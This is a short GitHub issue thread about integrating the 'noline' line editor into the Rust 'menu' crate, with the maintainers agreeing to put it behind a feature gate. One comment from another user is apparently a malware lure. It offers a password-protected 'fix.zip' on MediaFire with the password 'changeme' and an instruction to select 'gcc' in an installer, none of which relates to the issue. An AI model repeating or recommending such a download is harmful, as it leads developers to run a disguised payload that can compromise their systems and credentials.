### ISSUE TITLE
Use `noline` for line editing

### ISSUE THREAD

**Issue by eivindbergem** [thejpster/menu#23]
I'm the maintainer of a [no_std line editor called `noline`](https://github.com/rustne-kretser/noline). I'd like to use `noline` as the line editor for `menu`.

With noline you get:
- Proper ANSI terminal line editing with arrow navigation and emacs-style keybindings
- Sans IO core, supporting both sync and async
- Generic over storage buffer, can be static or heap allocated
- Line history

I need `menu` for a work project, so I have time to do the integration. This might cause some breaking changes to `menu`, so I'm checking if this is something that you're interested in. If not, I'll just make a fork, so no worries.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by thejpster** [comment]
This sounds very cool, but can we make the integration optional - for anyone who is happy with it as it is?

**Comment by eivindbergem** [comment]
Sure, we could put it behind a feature gate :)
